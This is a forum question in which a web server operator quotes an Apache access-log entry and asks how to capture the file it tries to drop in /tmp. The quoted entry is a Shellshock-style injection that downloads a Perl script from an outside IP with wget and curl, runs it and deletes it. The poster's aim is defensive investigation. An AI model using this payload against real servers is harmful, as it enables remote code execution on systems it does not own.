Similar questions were asked, but they either did not work for me, or I could not understand the answers.
I run the Apache2 web server and host several small personal sites. I am subjected to cyber-persecution, or someone is trying to hack me.
Apache2 Access Log displays
195.154.80.205 - - [05 / November / 2015: 09: 57: 09 +0000] "GET / info.cgi HTTP / 1.1" 404 464 "-" "() {:;}; / usr / bin / perl - e 'print \ "Content-Type: text / plain \ r \ n \ r \ nXSUCCESS! \ "; System (\" wget http://190.186.76.252/cox.pl -O / tmp / cox.pl; -O curl / tmp / cox.pl http://190.186.76.252/cox.pl ; perl /tmp/cox.pl; rm -rf / tmp / cox.pl * \ ");"
which is clearly trying (over and over in my logs) to force my server to load "cox.pl" and then run "cox.pl" and then delete "cox.pl".
I really want to know what is in cox.pl, which may be a modified version of Cox-Data-Usage , which is on github.
I would like the script to constantly monitor my folder /tmp, and when a new file is added, copy this file to another directory to see what it is doing, or try to do at least.
I know that I can refuse access, etc., but I want to find out what these hackers are doing and see if I can collect information about this.
source
share